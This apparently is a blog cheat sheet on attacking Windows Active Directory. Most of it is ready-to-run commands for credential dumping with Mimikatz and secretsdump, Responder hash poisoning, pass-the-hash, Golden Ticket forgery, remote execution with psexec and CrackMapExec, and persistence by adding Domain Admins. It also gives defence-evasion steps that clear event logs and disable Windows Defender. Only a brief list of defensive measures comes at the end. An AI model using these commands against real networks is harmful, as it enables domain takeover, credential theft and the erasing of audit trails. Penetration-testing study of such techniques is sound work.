What is Active Directory?
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It’s widely used to manage permissions and access to network resources. Compromising AD can give attackers significant control over an organization’s infrastructure.
Pre-requisites for AD Hacking
- A foothold in the domain (typically via phishing, exploitation, or lateral movement).
- Credentials of a domain user account (low or high privilege).
- Tools like Impacket, BloodHound, Responder, Mimikatz, and CrackMapExec are crucial.
Reconnaissance and Enumeration
1. AD Domain Enumeration with net Commands
Use built-in Windows commands to gather basic domain information.
| Command | Description |
|---|---|
net user /domain | List all users in the domain |
net group /domain | List domain groups |
net group "Domain Admins" /domain | List members of the Domain Admins group |
net group "Enterprise Admins" /domain | List members of the Enterprise Admins group |
net localgroup administrators | List local administrators on the current machine |
2. LDAP Enumeration with ldapdomaindump
ldapdomaindump is used to dump Active Directory information using LDAP.
ldapdomaindump -u 'domain/user' -p 'password' -d 192.168.1.100This command will dump detailed information about the AD environment, including users, groups, computers, and GPOs.
3. AD Enumeration with BloodHound
BloodHound helps visualize AD relationships and find attack paths.
- Ingestor Tool:
SharpHound.ps1orSharpHound.exe - Run the tool from an AD-joined system to collect data:
Invoke-BloodHound -CollectionMethod All -DomainFQDN <domain> -ZipFilename <output>Upload the ZIP file to the BloodHound interface and analyze AD attack paths.
Credential Harvesting
1. Dumping Hashes with Mimikatz
Mimikatz is a powerful tool for extracting credentials from memory.
mimikatz.exeOnce in Mimikatz, use the following commands:
| Command | Description |
|---|---|
privilege::debug | Enable debug mode (required for credential dumping) |
sekurlsa::logonpasswords | Dump plaintext credentials and hashes from memory |
lsadump::dcsync /user:Administrator | Perform a DCSync attack to dump password hashes from the domain controller |
2. NTLM Hash Dumping with Secretsdump (Impacket)
Impacket’s secretsdump.py can be used to dump password hashes from a compromised system or Domain Controller.
secretsdump.py domain/user:[email protected]You can use NTLM hashes instead of passwords for authentication:
secretsdump.py -hashes <lm>:<nt> domain/[email protected]3. LLMNR/NBT-NS Poisoning with Responder
Responder captures NTLMv1/NTLMv2 hashes by poisoning LLMNR and NBT-NS requests.
sudo responder -I <interface>- Wait for hashes to be captured, which can later be cracked using tools like
hashcat.
Privilege Escalation Techniques
1. Pass-the-Hash (PTH) with CrackMapExec
CrackMapExec allows the use of NTLM hashes to authenticate without knowing the password (Pass-the-Hash attack).
crackmapexec smb <target_ip> -u <username> -H <NTLM_hash>If the hash is valid, this will give you access to the target machine without needing the password.
2. Overpass-the-Hash (Pass-the-Key) with Mimikatz
Using NTLM hashes to get Kerberos tickets (TGT):
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:cmdThis provides a command prompt running as the user whose hash you possess.
3. DCSync Attack with Mimikatz
The DCSync attack simulates the behavior of a Domain Controller, allowing you to dump password hashes.
lsadump::dcsync /user:AdministratorThis command retrieves the NTLM hash of any user, including privileged accounts like Domain Admins.
4. Golden Ticket Attack
Generate a Kerberos Golden Ticket using Mimikatz to impersonate any user, including Domain Admins:
kerberos::golden /user:<user> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /id:<RID> /target:<domain_controller>- krbtgt_hash: You must extract the
krbtgthash before creating a Golden Ticket.
Lateral Movement Techniques
1. SMB Lateral Movement with CrackMapExec
Use CrackMapExec to execute commands on remote systems over SMB.
crackmapexec smb <target_ip> -u <user> -p <password> --exec-method smbexec --command "whoami"2. Remote Code Execution with PsExec (Impacket)
Impacket’s psexec.py can be used to execute commands on a remote machine via SMB.
psexec.py domain/user:[email protected]You can also use NTLM hashes with this:
psexec.py -hashes <lm>:<nt> domain/[email protected]3. WMI Execution with CrackMapExec
crackmapexec smb <target_ip> -u <user> -p <password> --exec-method wmiexec --command "whoami"Persistence Techniques
1. Adding a User to Domain Admins Group
You can add a new user to the Domain Admins group to maintain persistence.
net user <username> <password> /add /domain
net group "Domain Admins" <username> /add /domain2. Golden Ticket Persistence with Mimikatz
Golden Tickets can be generated and reused to maintain persistent access as any user (e.g., Domain Admin).
kerberos::golden /user:<user> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash>Defensive Evasion
1. Clearing Event Logs with PowerShell
wevtutil cl System
wevtutil cl Security
wevtutil cl Application2. Disabling Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true3. Bypassing Antivirus with Mimikatz
Use obfuscation or AMSI bypass techniques to evade antivirus detection.
powershell -ep bypassDefensive Measures Against AD Attacks
- Enforce Strong Password Policies: Use complex passwords, especially for privileged accounts.
- Monitor AD Event Logs: Track suspicious events like DCSync attempts, Golden Ticket usage, and lateral movement.
- Restrict Administrative Privileges: Use the principle of least privilege for all accounts.
- Use Multi-factor Authentication (MFA): Especially for sensitive accounts like Domain Admins.
- Regularly Rotate krbtgt Key: To protect against Golden Ticket attacks.
- Disable Unnecessary Services: Disable LLMNR and NBT-NS to prevent Responder attacks.
Leave a Reply